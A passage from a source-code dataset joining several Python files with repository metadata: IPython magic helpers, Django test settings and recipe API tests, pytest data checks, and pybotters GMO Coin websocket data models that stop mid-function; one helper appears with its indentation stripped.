    except (ValueError, TypeError) as e:
        print e.args[0]
        return
    macro = Macro(lines)
    self.shell.define_macro(name, macro)
    if not ( 'q' in opts) :
        print 'Macro `%s` created. To execute, type its name (without quotes).' % name
        print '=== Macro contents: ==='
        print macro,
@magic_arguments.magic_arguments()
@magic_arguments.argument('output', type=str, default='', nargs='?',
    help="""The name of the variable in which to store output.
    This is a utils.io.CapturedIO object with stdout/err attributes
    for the text of the captured output.

    CapturedOutput also has a show() method for displaying the output,
    and __call__ as well, so you can use that to quickly display the
    output.

    If unspecified, captured output is discarded.
    """
)
@magic_arguments.argument('--no-stderr', action="store_true",
    help="""Don't capture stderr."""
)
@magic_arguments.argument('--no-stdout', action="store_true",
    help="""Don't capture stdout."""
)
@magic_arguments.argument('--no-display', action="store_true",
    help="""Don't capture IPython's rich display."""
)
@cell_magic
def capture(self, line, cell):
    """Run the cell while capturing stdout, stderr, and rich display output.

    The captured output is stored in the user namespace under the name
    given as the positional argument (discarded when no name is given).
    """
    opts = magic_arguments.parse_argstring(self.capture, line)
    # Each --no-* flag disables capture of the corresponding stream.
    capture_stdout = not opts.no_stdout
    capture_stderr = not opts.no_stderr
    capture_display = not opts.no_display
    with capture_output(capture_stdout, capture_stderr, capture_display) as captured:
        self.shell.run_cell(cell)
    if opts.output:
        self.shell.user_ns[opts.output] = captured
def parse_breakpoint(text, current_file):
    """Split a breakpoint specification into a ``(file, line)`` pair.

    ``"file:line"`` yields ``(file, line)``; a bare ``"line"`` yields
    ``(current_file, line)``.  The line component is converted to int.
    """
    head, sep, tail = text.partition(':')
    if sep:
        return head, int(tail)
    return current_file, int(text)
def _format_time(timespan, precision=3):
"""Formats the timespan in a human readable form"""
import math
if timespan >= 60.0:
# we have more than a minute, format that in a human readable form
# Idea from http://snipplr.com/view/5713/
parts = [("d", 60*60*24),("h", 60*60),("min", 60), ("s", 1)]
time = []
leftover = timespan
for suffix, length in parts:
value = int(leftover / length)
if value > 0:
leftover = leftover % length
time.append(u'%s%s' % (str(value), suffix))
if leftover < 1:
break
return " ".join(time)
# Unfortunately the unicode 'micro' symbol can cause problems in
# certain terminals.
# See bug: https://bugs.launchpad.net/ipython/+bug/348466
# Try to prevent crashes by being more secure than it needs to
# E.g. eclipse is able to print a µ, but has no sys.stdout.encoding set.
units = [u"s", u"ms",u'us',"ns"] # the save value
if hasattr(sys.stdout, 'encoding') and sys.stdout.encoding:
try:
u'\xb5'.encode(sys.stdout.encoding)
units = [u"s", u"ms",u'\xb5s',"ns"]
except:
pass
scaling = [1, 1e3, 1e6, 1e9]
if timespan > 0.0:
order = min(-int(math.floor(math.log10(timespan)) // 3), 3)
else:
order = 3
ret = u"%.*g %s" % (precision, timespan * scaling[order], units[order])
return ret
| 38.442203 | 92 | 0.567908 |
795bbd5d7f560cde381299806a3706c4dbb8b125 | 126 | py | Python | __init__.py | nchauhan890/tagger | 1b3769a6a8d540a58a608be276055282a697c00e | [
"MIT"
] | 2 | 2020-01-25T21:40:47.000Z | 2020-01-26T12:38:23.000Z | __init__.py | nchauhan890/tagger | 1b3769a6a8d540a58a608be276055282a697c00e | [
"MIT"
] | null | null | null | __init__.py | nchauhan890/tagger | 1b3769a6a8d540a58a608be276055282a697c00e | [
"MIT"
] | null | null | null | import tagger.api as api
import tagger.structure as structure
import tagger.lexers as lexers
import tagger.parsers as parsers
| 25.2 | 36 | 0.84127 |
795bbd6d3ea7917e85e2edd55a47bb85467ee617 | 2,933 | py | Python | test_settings.py | tony-joseph/crimson_antispam | 81c75f5ba80555f5d540133d0c10a9d8610321ee | [
"BSD-3-Clause"
] | 5 | 2018-02-13T13:17:24.000Z | 2020-05-06T16:59:37.000Z | test_settings.py | tony-joseph/crimson-antispam | 81c75f5ba80555f5d540133d0c10a9d8610321ee | [
"BSD-3-Clause"
] | 1 | 2016-04-25T09:20:16.000Z | 2016-04-26T15:25:30.000Z | test_settings.py | tony-joseph/crimson_antispam | 81c75f5ba80555f5d540133d0c10a9d8610321ee | [
"BSD-3-Clause"
] | 1 | 2018-04-13T09:03:41.000Z | 2018-04-13T09:03:41.000Z | import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'c1!c3)sz$t$i=_a6z@eg#^zs*4v5z47s1^akw!*p!)jf8+exf%'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'antispam'
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'test_urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
# crimson_antispam settings
ANTISPAM_SETTINGS = {
'REQUEST_INTERVAL': 1000,
}
| 24.855932 | 91 | 0.691101 |
795bbd93b7fd55c31805ab1067c3aefcd4971cbf | 10,129 | py | Python | app/recipe/tests/test_recipe_api.py | mathewajik/recipe-app-api | 2f7ba9ea7713f2420d9ffbe78bcaec090ac014d3 | [
"MIT"
] | null | null | null | app/recipe/tests/test_recipe_api.py | mathewajik/recipe-app-api | 2f7ba9ea7713f2420d9ffbe78bcaec090ac014d3 | [
"MIT"
] | null | null | null | app/recipe/tests/test_recipe_api.py | mathewajik/recipe-app-api | 2f7ba9ea7713f2420d9ffbe78bcaec090ac014d3 | [
"MIT"
] | null | null | null | import os
import tempfile
from PIL import Image
from core.models import Recipe, Tag, Ingredient
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.urls import reverse
from recipe.serializers import RecipeSerializer, RecipeDetailSerializer
from rest_framework import status
from rest_framework.test import APIClient
RECIPES_URL = reverse('recipe:recipe-list')
def image_upload_url(recipe_id):
    """Return the image-upload URL for the recipe with *recipe_id*."""
    view_name = 'recipe:recipe-upload-image'
    return reverse(view_name, args=[recipe_id])
def detail_url(recipe_id):
    """Return the detail URL for the recipe with *recipe_id*."""
    view_name = 'recipe:recipe-detail'
    return reverse(view_name, args=[recipe_id])
def sample_tag(user, name='Main course'):
    """Create and return a sample tag owned by *user*."""
    return Tag.objects.create(name=name, user=user)
def sample_ingredient(user, name='Cinnamon'):
    """Create and return a sample ingredient owned by *user*."""
    return Ingredient.objects.create(name=name, user=user)
def sample_recipe(user, **params):
    """Create and return a sample recipe; *params* override the defaults."""
    fields = {
        'title': 'Sample recipe',
        'time_minutes': 10,
        'price': 5.00,
        **params,
    }
    return Recipe.objects.create(user=user, **fields)
class PublicRecipeApiTests(TestCase):
    """Test unauthenticated recipe API access"""
    def setUp(self):
        # Deliberately no force_authenticate(): requests are anonymous.
        self.client = APIClient()
    def test_required_auth(self):
        """Test that authentication is required"""
        res = self.client.get(RECIPES_URL)
        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateRecipeApiTests(TestCase):
    """Test authenticated recipe API access"""
    def setUp(self):
        # Every test in this class runs as a pre-authenticated user.
        self.client = APIClient()
        self.user = get_user_model().objects.create_user(
            'test@londonappdev.com',
            'testpass'
        )
        self.client.force_authenticate(self.user)
    def test_retrieve_recipes(self):
        """Test retrieving list of recipes"""
        sample_recipe(user=self.user)
        sample_recipe(user=self.user)
        res = self.client.get(RECIPES_URL)
        recipes = Recipe.objects.all().order_by('-id')
        serializer = RecipeSerializer(recipes, many=True)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(res.data, serializer.data)
    def test_recipes_limited_to_user(self):
        """Test retrieving recipes for user"""
        # A second user's recipe must not appear in this user's listing.
        user2 = get_user_model().objects.create_user(
            'other@londonappdev.com',
            'password123'
        )
        sample_recipe(user=user2)
        sample_recipe(user=self.user)
        res = self.client.get(RECIPES_URL)
        recipes = Recipe.objects.filter(user=self.user)
        serializer = RecipeSerializer(recipes, many=True)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(len(res.data), 1)
        self.assertEqual(res.data, serializer.data)
    def test_view_recipe_detail(self):
        """Test viewing a recipe detail"""
        recipe = sample_recipe(user=self.user)
        recipe.tags.add(sample_tag(user=self.user))
        recipe.ingredients.add(sample_ingredient(user=self.user))
        url = detail_url(recipe.id)
        res = self.client.get(url)
        serializer = RecipeDetailSerializer(recipe)
        self.assertEqual(res.data, serializer.data)
    def test_create_basic_recipe(self):
        """Test creating recipe"""
        payload = {
            'title': 'Chocolate cheesecake',
            'time_minutes': 30,
            'price': 5.00
        }
        res = self.client.post(RECIPES_URL, payload)
        self.assertEqual(res.status_code, status.HTTP_201_CREATED)
        # Verify every submitted field was persisted on the created object.
        recipe = Recipe.objects.get(id=res.data['id'])
        for key in payload.keys():
            self.assertEqual(payload[key], getattr(recipe, key))
    def test_create_recipe_with_tags(self):
        """Test creating a recipe with tags"""
        tag1 = sample_tag(user=self.user, name='Vegan')
        tag2 = sample_tag(user=self.user, name='Dessert')
        payload = {
            'title': 'Avocado lime cheesecake',
            'tags': [tag1.id, tag2.id],
            'time_minutes': 60,
            'price': 20.00
        }
        res = self.client.post(RECIPES_URL, payload)
        self.assertEqual(res.status_code, status.HTTP_201_CREATED)
        recipe = Recipe.objects.get(id=res.data['id'])
        tags = recipe.tags.all()
        self.assertEqual(tags.count(), 2)
        self.assertIn(tag1, tags)
        self.assertIn(tag2, tags)
    def test_create_recipe_with_ingredients(self):
        """Test creating recipe with ingredients"""
        ingredient1 = sample_ingredient(user=self.user, name='Prawns')
        ingredient2 = sample_ingredient(user=self.user, name='Ginger')
        payload = {
            'title': 'Thai prawn red curry',
            'ingredients': [ingredient1.id, ingredient2.id],
            'time_minutes': 20,
            'price': 7.00
        }
        res = self.client.post(RECIPES_URL, payload)
        self.assertEqual(res.status_code, status.HTTP_201_CREATED)
        recipe = Recipe.objects.get(id=res.data['id'])
        ingredients = recipe.ingredients.all()
        self.assertEqual(ingredients.count(), 2)
        self.assertIn(ingredient1, ingredients)
        self.assertIn(ingredient2, ingredients)
    def test_partial_update_recipe(self):
        """Test updating a recipe with patch"""
        recipe = sample_recipe(user=self.user)
        recipe.tags.add(sample_tag(user=self.user))
        new_tag = sample_tag(user=self.user, name='Curry')
        payload = {'title': 'Chicken tikka', 'tags': [new_tag.id]}
        url = detail_url(recipe.id)
        self.client.patch(url, payload)
        recipe.refresh_from_db()
        self.assertEqual(recipe.title, payload['title'])
        # PATCH with 'tags' replaces the tag set: only the new tag remains.
        tags = recipe.tags.all()
        self.assertEqual(len(tags), 1)
        self.assertIn(new_tag, tags)
    def test_full_update_recipe(self):
        """Test updating a recipe with put"""
        recipe = sample_recipe(user=self.user)
        recipe.tags.add(sample_tag(user=self.user))
        payload = {
            'title': 'Spaghetti carbonara',
            'time_minutes': 25,
            'price': 5.00
        }
        url = detail_url(recipe.id)
        self.client.put(url, payload)
        recipe.refresh_from_db()
        self.assertEqual(recipe.title, payload['title'])
        self.assertEqual(recipe.time_minutes, payload['time_minutes'])
        self.assertEqual(recipe.price, payload['price'])
        # PUT omitted 'tags', so the previously attached tag is cleared.
        tags = recipe.tags.all()
        self.assertEqual(len(tags), 0)
    def test_filter_recipes_by_tags(self):
        """Test returning recipes with specific tags"""
        recipe1 = sample_recipe(user=self.user, title='Thai vegetable curry')
        recipe2 = sample_recipe(user=self.user, title='Aubergine with tahini')
        tag1 = sample_tag(user=self.user, name='Vegan')
        tag2 = sample_tag(user=self.user, name='Vegetarian')
        recipe1.tags.add(tag1)
        recipe2.tags.add(tag2)
        recipe3 = sample_recipe(user=self.user, title='Fish and chips')
        # 'tags' query param is a comma-separated list of tag ids.
        res = self.client.get(
            RECIPES_URL,
            {'tags': f'{tag1.id},{tag2.id}'}
        )
        serializer1 = RecipeSerializer(recipe1)
        serializer2 = RecipeSerializer(recipe2)
        serializer3 = RecipeSerializer(recipe3)
        self.assertIn(serializer1.data, res.data)
        self.assertIn(serializer2.data, res.data)
        self.assertNotIn(serializer3.data, res.data)
    def test_filter_recipes_by_ingredients(self):
        """Test returning recipes with specific ingredients"""
        recipe1 = sample_recipe(user=self.user, title='Posh beans on toast')
        recipe2 = sample_recipe(user=self.user, title='Chicken cacciatore')
        ingredient1 = sample_ingredient(user=self.user, name='Feta cheese')
        ingredient2 = sample_ingredient(user=self.user, name='Chicken')
        recipe1.ingredients.add(ingredient1)
        recipe2.ingredients.add(ingredient2)
        recipe3 = sample_recipe(user=self.user, title='Steak and mushrooms')
        # 'ingredients' query param is a comma-separated list of ids.
        res = self.client.get(
            RECIPES_URL,
            {'ingredients': f'{ingredient1.id},{ingredient2.id}'}
        )
        serializer1 = RecipeSerializer(recipe1)
        serializer2 = RecipeSerializer(recipe2)
        serializer3 = RecipeSerializer(recipe3)
        self.assertIn(serializer1.data, res.data)
        self.assertIn(serializer2.data, res.data)
        self.assertNotIn(serializer3.data, res.data)
class RecipeImageUploadTests(TestCase):
    """Tests for the recipe image upload endpoint."""
    def setUp(self):
        self.client = APIClient()
        self.user = get_user_model().objects.create_user(
            'user@londonappdev.com',
            'testpass'
        )
        self.client.force_authenticate(self.user)
        self.recipe = sample_recipe(user=self.user)
    def tearDown(self):
        # Remove the uploaded file so test runs don't accumulate media files.
        self.recipe.image.delete()
    def test_upload_image_to_recipe(self):
        """Test uploading an image to recipe"""
        url = image_upload_url(self.recipe.id)
        with tempfile.NamedTemporaryFile(suffix='.jpg') as ntf:
            # Write a tiny 10x10 JPEG, then rewind so the upload reads it
            # from the beginning.
            img = Image.new('RGB', (10, 10))
            img.save(ntf, format='JPEG')
            ntf.seek(0)
            res = self.client.post(url, {'image': ntf}, format='multipart')
        self.recipe.refresh_from_db()
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertIn('image', res.data)
        self.assertTrue(os.path.exists(self.recipe.image.path))
    def test_upload_image_bad_request(self):
        """Test uploading an invalid image"""
        url = image_upload_url(self.recipe.id)
        res = self.client.post(url, {'image': 'notimage'}, format='multipart')
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
795bbe94f03fab5b38bfc6985757b3e0c5a4f5a7 | 1,713 | py | Python | src/data/sql_pipeline/0.8 prices_monthly_snapshot/test_prices_monthly_snapshot.py | parker84/north-dash | 2a726075df46c931715548fb203b3ac909199587 | [
"MIT"
] | null | null | null | src/data/sql_pipeline/0.8 prices_monthly_snapshot/test_prices_monthly_snapshot.py | parker84/north-dash | 2a726075df46c931715548fb203b3ac909199587 | [
"MIT"
] | 1 | 2022-02-26T18:10:05.000Z | 2022-02-26T18:10:05.000Z | src/data/sql_pipeline/0.8 prices_monthly_snapshot/test_prices_monthly_snapshot.py | parker84/northdash | 2a726075df46c931715548fb203b3ac909199587 | [
"MIT"
] | null | null | null | import pytest
from settings import ENGINE_PATH
from sqlalchemy import create_engine
from pandas_profiling import ProfileReport
import pandas as pd
import datetime
from src.utils.testing_suite import TestSuite
# NOTE: importing this module opens a live DB connection (import-time side
# effect); ENGINE_PATH comes from the project settings module.
engine = create_engine(ENGINE_PATH)
conn = engine.connect()
# Shared assertion helper: these three columns must uniquely identify a row.
prepped_test_suite = TestSuite(
    unique_cols=['month_begin_date', 'geo', 'product_group']
)
@pytest.fixture
def prices_monthly_snapshot():
    # Load the staged table; as a side effect, write an HTML profiling
    # report for manual EDA review.
    df = pd.read_sql("select * from stg.prices_monthly_snapshot", con=conn)
    profile = ProfileReport(df, title="Raw Pandas Profiling Report", minimal=True)
    profile.to_file("./reports/eda_reports/processed/prices_monthly_snapshot.html")
    return df
@pytest.fixture
def prices_monthly_snapshot_filtered(prices_monthly_snapshot):
    # Restrict to the aggregate 'All-items' series from 2005-01 onward.
    out_df = prices_monthly_snapshot.query(
        "product_group == 'All-items'"
    )
    out_df = out_df[out_df.month_begin_date >= datetime.date(2005, 1, 1)]
    return out_df
def test_processed_unique_column_set(prices_monthly_snapshot, prices_monthly_snapshot_filtered):
    # Uniqueness must hold both before and after filtering.
    prepped_test_suite.test_for_unique_column_set(prices_monthly_snapshot)
    prepped_test_suite.test_for_unique_column_set(prices_monthly_snapshot_filtered)
def test_processed_non_null_cols(prices_monthly_snapshot):
    prepped_test_suite.test_for_nulls(
        prices_monthly_snapshot,
        non_null_cols=['month_begin_date', 'geo', 'product_group', 'consumer_price_index']
    )
def test_processed_for_holes(prices_monthly_snapshot_filtered):
    # prepped_test_suite.test_for_holes(prices_monthly_snapshot) # these do have holes, in part bc nunavut didn't become an official territory until 1999
    prepped_test_suite.test_for_holes(prices_monthly_snapshot_filtered)
795bc01c7f46fe923148ec3a456ed494ffedaf49 | 20,193 | py | Python | pybotters/models/gmocoin.py | yoshiY-private/pybotters | 571fa207470d9aebed4b2966815489bd1e5c95b6 | [
"MIT"
] | 1 | 2022-03-24T13:27:33.000Z | 2022-03-24T13:27:33.000Z | pybotters/models/gmocoin.py | yoshiY-private/pybotters | 571fa207470d9aebed4b2966815489bd1e5c95b6 | [
"MIT"
] | null | null | null | pybotters/models/gmocoin.py | yoshiY-private/pybotters | 571fa207470d9aebed4b2966815489bd1e5c95b6 | [
"MIT"
] | null | null | null | from __future__ import annotations
import asyncio
import logging
from datetime import datetime, timezone
from dateutil import parser
from decimal import Decimal
from enum import Enum, auto
from typing import Any, Awaitable, Optional, cast
import aiohttp
from pybotters.store import DataStore, DataStoreManager
from pybotters.typedefs import Item
from ..auth import Auth
from ..ws import ClientWebSocketResponse
try:
from typing import TypedDict
except ImportError:
from typing_extensions import TypedDict
logger = logging.getLogger(__name__)
def parse_datetime(x: Any) -> datetime:
    """Parse a timestamp string into a naive ``datetime``.

    A slicing fast path handles the common
    ``YYYY-MM-DDTHH:MM:SS[.ffffff]Z`` shape; any string that trips it up
    falls back to ``dateutil.parser.parse``. Non-strings raise ValueError.
    """
    if not isinstance(x, str):
        raise ValueError(f'x only support str, but {type(x)} passed.')
    try:
        # Swap 'T' for a space, drop the trailing character (the 'Z'),
        # and pad with zeros so the microsecond slice is always valid.
        stamp = x.replace('T', ' ')[:-1] + '00000000'
        return datetime(
            int(stamp[0:4]),
            int(stamp[5:7]),
            int(stamp[8:10]),
            int(stamp[11:13]),
            int(stamp[14:16]),
            int(stamp[17:19]),
            int(stamp[20:26]),
        )
    except Exception:
        # Fast path failed: hand the raw string to the tolerant parser.
        return parser.parse(x)
class ApiType(Enum):
    """
    API category (public vs. private endpoints).
    """
    Public = auto()
    Private = auto()
class Channel(Enum):
    """
    WebSocket API channels.
    """
    # Public
    TICKER = auto()
    ORDER_BOOKS = auto()
    TRADES = auto()
    # Private
    EXECUTION_EVENTS = auto()
    ORDER_EVENTS = auto()
    POSITION_EVENTS = auto()
    POSITION_SUMMARY_EVENTS = auto()
    @staticmethod
    def from_str(name: str) -> "Channel":
        """Map a wire-format channel name (e.g. ``"orderbooks"``) to a member."""
        # Lazily build and cache the name->member table on the class the
        # first time this is called (Enum permits adding non-member class
        # attributes after definition). Unknown names raise KeyError.
        if not hasattr(Channel, "_table"):
            Channel._table = {
                "ticker": Channel.TICKER,
                "orderbooks": Channel.ORDER_BOOKS,
                "trades": Channel.TRADES,
                "executionEvents": Channel.EXECUTION_EVENTS,
                "orderEvents": Channel.ORDER_EVENTS,
                "positionEvents": Channel.POSITION_EVENTS,
                "positionSummaryEvents": Channel.POSITION_SUMMARY_EVENTS,
            }
        return Channel._table[name]
class MessageType(Enum):
    """
    Message types carried in the websocket ``msgType`` field.
    """
    NONE = auto()
    ER = auto()
    NOR = auto()
    ROR = auto()
    COR = auto()
    OPR = auto()
    UPR = auto()
    ULR = auto()
    CPR = auto()
    INIT = auto()
    UPDATE = auto()
    PERIODIC = auto()
class Symbol(Enum):
    """
    Supported trading symbols.
    """
    BTC = auto()
    ETH = auto()
    BCH = auto()
    LTC = auto()
    XRP = auto()
    BTC_JPY = auto()
    ETH_JPY = auto()
    BCH_JPY = auto()
    LTC_JPY = auto()
    XRP_JPY = auto()
class OrderSide(Enum):
    """
    Order side (buy / sell).
    """
    BUY = auto()
    SELL = auto()
class ExecutionType(Enum):
    """
    Order execution type (market / limit / stop).
    """
    MARKET = auto()
    LIMIT = auto()
    STOP = auto()
class TimeInForce(Enum):
    """
    Time-in-force conditions.
    """
    FAK = auto()
    FAS = auto()
    FOK = auto()
    SOK = auto()
class SettleType(Enum):
    """
    Settlement type (open / close / loss cut).
    """
    OPEN = auto()
    CLOSE = auto()
    LOSS_CUT = auto()
class OrderType(Enum):
    """
    Order category (normal / losscut).
    """
    NORMAL = auto()
    LOSSCUT = auto()
class OrderStatus(Enum):
    """
    Order lifecycle status.
    """
    WAITING = auto()
    ORDERED = auto()
    MODIFYING = auto()
    CANCELLING = auto()
    CANCELED = auto()
    EXECUTED = auto()
    EXPIRED = auto()
class CancelType(Enum):
    """
    Reason an order was cancelled.
    """
    NONE = auto()
    USER = auto()
    POSITION_LOSSCUT = auto()
    INSUFFICIENT_BALANCE = auto()
    INSUFFICIENT_MARGIN = auto()
    ACCOUNT_LOSSCUT = auto()
    MARGIN_CALL = auto()
    MARGIN_CALL_LOSSCUT = auto()
    EXPIRED_FAK = auto()
    EXPIRED_FOK = auto()
    EXPIRED_SOK = auto()
    CLOSED_ORDER = auto()
    SOK_TAKER = auto()
    PRICE_LIMIT = auto()
class Ticker(TypedDict):
    """Best bid/ask plus daily stats for one symbol."""
    ask: Decimal
    bid: Decimal
    high: Decimal
    last: Decimal
    low: Decimal
    symbol: Symbol
    timestamp: datetime
    volume: Decimal
class OrderLevel(TypedDict):
    """A single price level on one side of the order book."""
    symbol: Symbol
    side: OrderSide
    price: Decimal
    size: Decimal
class OrderBook(TypedDict):
    """Full order book snapshot for one symbol."""
    asks: list[OrderLevel]
    bids: list[OrderLevel]
    symbol: Symbol
    timestamp: datetime
class Trade(TypedDict):
    """A single public trade."""
    price: Decimal
    side: OrderSide
    size: Decimal
    timestamp: datetime
    symbol: Symbol
class Execution(TypedDict):
    """One fill of an order."""
    execution_id: int
    order_id: int
    symbol: Symbol
    side: OrderSide
    settle_type: SettleType
    size: Decimal
    price: Decimal
    timestamp: datetime
    loss_gain: Decimal
    fee: Decimal
    # properties that only appear in websocket messages (None otherwise)
    position_id: Optional[int]
    execution_type: Optional[ExecutionType]
    order_price: Optional[Decimal]
    order_size: Optional[Decimal]
    order_executed_size: Optional[Decimal]
    order_timestamp: Optional[datetime]
    time_in_force: Optional[str]
class Order(TypedDict):
    """An order and its current status."""
    order_id: int
    symbol: Symbol
    settle_type: SettleType
    execution_type: ExecutionType
    side: OrderSide
    order_status: OrderStatus
    order_timestamp: datetime
    price: Decimal
    size: Decimal
    executed_size: Decimal
    losscut_price: Decimal
    time_in_force: TimeInForce
    # properties that only appear in websocket messages
    cancel_type: Optional[CancelType]
class Position(TypedDict):
    """An individual open position."""
    position_id: int
    symbol: Symbol
    side: OrderSide
    size: Decimal
    # 'orderd_size' spelling mirrors the incoming payload key 'orderdSize'.
    orderd_size: Decimal
    price: Decimal
    loss_gain: Decimal
    leverage: Decimal
    losscut_price: Decimal
    timestamp: datetime
class PositionSummary(TypedDict):
    """Aggregated position per (symbol, side)."""
    symbol: Symbol
    side: OrderSide
    average_position_rate: Decimal
    position_loss_gain: Decimal
    sum_order_quantity: Decimal
    sum_position_quantity: Decimal
    timestamp: datetime
class TickerStore(DataStore):
    """Latest ticker, one entry per symbol."""
    _KEYS = ["symbol"]
    def _onmessage(self, mes: Ticker) -> None:
        self._update([cast(Item, mes)])
class OrderBookStore(DataStore):
    """Order book levels keyed by (symbol, side, price)."""
    _KEYS = ["symbol", "side", "price"]
    def _init(self) -> None:
        # Timestamp of the last snapshot applied in _onmessage.
        self.timestamp: Optional[datetime] = None
    def sorted(self, query: Optional[Item] = None) -> dict[OrderSide, list[OrderLevel]]:
        """Group levels matching *query* by side; asks ascend, bids descend by price."""
        if query is None:
            query = {}
        result: dict[OrderSide, list[OrderLevel]] = {
            OrderSide.BUY: [],
            OrderSide.SELL: [],
        }
        for item in self:
            # keep only items matching every key/value pair of the query
            if all(k in item and query[k] == item[k] for k in query):
                result[item["side"]].append(cast(OrderLevel, item))
        result[OrderSide.SELL].sort(key=lambda x: x["price"])
        result[OrderSide.BUY].sort(key=lambda x: x["price"], reverse=True)
        return result
    def _onmessage(self, mes: OrderBook) -> None:
        # Each message replaces all stored levels for the symbol
        # (delete the old book, then insert the new snapshot).
        data = mes["asks"] + mes["bids"]
        result = self.find({"symbol": mes["symbol"]})
        self._delete(result)
        self._insert(cast("list[Item]", data))
        self.timestamp = mes["timestamp"]
class TradeStore(DataStore):
    """Public trade feed; every message is appended."""
    def _onmessage(self, mes: Trade) -> None:
        self._insert([cast(Item, mes)])
class OrderStore(DataStore):
    """Orders keyed by order_id; only live orders are retained."""
    _KEYS = ["order_id"]
    def _onresponse(self, data: list[Order]) -> None:
        self._insert(cast("list[Item]", data))
    def _onmessage(self, mes: Order) -> None:
        # Orders stay in the store only while WAITING/ORDERED; any other
        # status removes them.
        if mes["order_status"] in (OrderStatus.WAITING, OrderStatus.ORDERED):
            self._update([cast(Item, mes)])
        else:
            self._delete([cast(Item, mes)])
    def _onexecution(self, mes: Execution) -> None:
        # Fold an execution event's cumulative executed size into the
        # stored order, deleting the order once it is completely filled.
        current = cast(Order, self.get({"order_id": mes["order_id"]}))
        if (
            mes["order_executed_size"]
            and current
            and current["executed_size"] < mes["order_executed_size"]
        ):
            current["executed_size"] = mes["order_executed_size"]
            remain = current["size"] - current["executed_size"]
            if remain == 0:
                self._delete([cast(Item, current)])
            else:
                self._update([cast(Item, current)])
class ExecutionStore(DataStore):
    """Execution (fill) history keyed by execution_id."""
    _KEYS = ["execution_id"]
    def sorted(self, query: Optional[Item] = None) -> list[Execution]:
        """Return executions matching *query*, highest execution_id first."""
        if query is None:
            query = {}
        result = []
        for item in self:
            if all(k in item and query[k] == item[k] for k in query):
                result.append(item)
        result.sort(key=lambda x: x["execution_id"], reverse=True)
        return result
    def _onresponse(self, data: list[Execution]) -> None:
        self._insert(cast("list[Item]", data))
    def _onmessage(self, mes: Execution) -> None:
        self._insert([cast(Item, mes)])
class PositionStore(DataStore):
    """Open positions keyed by position_id."""
    _KEYS = ["position_id"]
    def _onresponse(self, data: list[Position]) -> None:
        self._update(cast("list[Item]", data))
    def _onmessage(self, mes: Position, type: MessageType) -> None:
        # OPR events insert, CPR events delete, all other types update.
        if type == MessageType.OPR:
            self._insert([cast(Item, mes)])
        elif type == MessageType.CPR:
            self._delete([cast(Item, mes)])
        else:
            self._update([cast(Item, mes)])
class PositionSummaryStore(DataStore):
    """Aggregated position summary keyed by (symbol, side)."""
    _KEYS = ["symbol", "side"]
    def _onresponse(self, data: list[PositionSummary]) -> None:
        self._update(cast("list[Item]", data))
    def _onmessage(self, mes: PositionSummary) -> None:
        self._update([cast(Item, mes)])
class MessageHelper:
    """Static converters from raw payload dicts to the typed dicts above.

    Several fields fall back between two key spellings
    (e.g. ``executionPrice``/``price``), since the same record arrives
    with different keys depending on the endpoint.
    """
    @staticmethod
    def to_tickers(data: list[Item]) -> list["Ticker"]:
        return [MessageHelper.to_ticker(x) for x in data]
    @staticmethod
    def to_ticker(data: Item) -> "Ticker":
        return Ticker(
            ask=Decimal(data["ask"]),
            bid=Decimal(data["bid"]),
            high=Decimal(data["high"]),
            last=Decimal(data["last"]),
            low=Decimal(data["low"]),
            symbol=Symbol[data["symbol"]],
            timestamp=parse_datetime(data.get("timestamp")),
            volume=Decimal(data["volume"]),
        )
    @staticmethod
    def to_orderbook(data: Item) -> "OrderBook":
        return OrderBook(
            asks=[
                OrderLevel(
                    symbol=Symbol[data["symbol"]],
                    side=OrderSide.SELL,
                    price=Decimal(ol["price"]),
                    size=Decimal(ol["size"]),
                )
                for ol in data["asks"]
            ],
            bids=[
                OrderLevel(
                    symbol=Symbol[data["symbol"]],
                    side=OrderSide.BUY,
                    price=Decimal(ol["price"]),
                    size=Decimal(ol["size"]),
                )
                for ol in data["bids"]
            ],
            symbol=Symbol[data["symbol"]],
